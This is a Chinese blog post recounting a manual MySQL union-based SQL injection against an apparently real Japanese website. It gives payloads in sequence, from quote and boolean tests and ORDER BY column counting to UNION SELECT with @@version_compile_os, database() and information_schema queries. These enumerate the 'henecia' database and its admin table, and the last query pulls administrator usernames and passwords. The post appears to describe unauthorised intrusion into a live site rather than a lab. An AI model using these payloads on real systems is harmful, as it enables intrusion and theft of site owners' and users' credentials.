实战记录,日本某站






注入点 and 语句测试

and1=1 返回正常,and=2跳回首页,可能过滤了


wKioL1ltZk3hSd-nAAN4CoUQv1I730.png-wh_50

wKioL1ltZk_j4iN6AAFs6JV5cXw757.png-wh_50








用 ’ 测试返回错误页面


判断为注入点

wKiom1ltZlHTf4VZAADYas1rRuc350.png-wh_50




order by语句查询字段数


wKiom1ltZ6-iOcGdAAFuwHCurns338.png-wh_50




wKioL1ltZ7KxO4PyAADhCX1M1z8149.png-wh_50




测试字段数为9


wKiom1ltaJLzMUncAAF3ymhdyZw657.png-wh_50






and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9

报错联合查询语句,查询显示位

2、3为显示位

wKioL1ltaP-ByAh8AAEvb9Kk5VE997.png-wh_50





使用注入函数可爆出数据库版本信息


wKiom1ltakKgOvLyAAEsbpbGlNw781.png-wh_50







and 1=2 UNION SELECT 1,@@version_compile_os,3,4,5,6,7,8,9

注入函数@@version_compile_os爆出操作系统


wKioL1ltbL6higBxAADSX-WMFZc208.png-wh_50






and 1=2 UNION SELECT 1,database(),3,4,5,6,7,8,9

用注入函数database()爆出当前库

wKioL1ltbhiwoG-qAADwEPQGh0M964.png-wh_50






Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息

and1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8,9 from information_schema.SCHEMATA limit 0,1


wKioL1ltdkmTzuoYAAF85TGz8Lw035.png-wh_50

库1<information_schema>






爆出第二个数据库,limit1,1即可

发现第二个数据库就是当前库

wKiom1ltdkzglFCWAAHuVZt0ZRE405.png-wh_50

库2<henecia>






and 1=2 union select 1,TABLE_NAME,3,4,5,6,7,8,9from information_schema.TABLES where TABLE_SCHEMA=(库2名字16进制)limit 0,1

爆第一个表名,数据库名要转换为16进制


wKiom1lth_uTkw1zAAGjyROiBV0665.png-wh_50

表1 <TM_ADMIN_MEMBER>敏感表











改为limit 1,1可爆第二个表名


wKiom1ltiEbxFfLuAACQ93T7INI485.png-wh_50

表2<TM_BANNER_MASTER>







and 1=2 union select 1,group_concat(TABLE_NAME),3,4,5,6,7,8,9 from information_schema.TABLES where TABLE_SCHEMA=0x68656E65636961 limit 0,1


使用group_concat(table_name)可以一次爆出全部表名

wKioL1ltflLiU5LGAAGo434Rh9w648.png-wh_50







已得到敏感表名TM_ADMIN_MEMBER,接下来爆字段



表名要转换为16进制

and 1=2 union select 1,COLUMN_NAME,3,4,5,6,7,8,9 from information_schema.COLUMNS where TABLE_NAME=<转换为16进制的表名> limit 0,1

wKiom1ltdlGjhMmHAADNlwFsFRA628.png-wh_50






推荐使用这种方法



and 1=2 union select 1,group_concat(COLUMN_NAME),3,4,5,6,7,8,9 from information_schema.COLUMNS where TABLE_NAME=<转换为16进制的表名> limit 0,1

#COLUMN  翻译为  列

group_concat(COLUMN_NAME)函数可以一次爆出全部字段

或者可以修改limit 1,1、limit 2,1.......来一个一个爆出


wKiom1ltiL_CL5gLAADorGzy2I8469.png-wh_50

敏感字段<admin_id、login_id、login_pwd>







 有敏感表名,敏感字段名后就获取内容

经测试login_uid字段存放的是用户名

login_pwd存放的是密码

and 1=2 union select 1,login_uid,login_pwd,4,5,6,7,8,9 from 表名


wKiom1lthRDzL3l1AACdOsgD95M455.png-wh_50





















接下来的自行脑补.......t_0005.gif









欢迎各位大神指点批评!




                                                                                                                                           晨风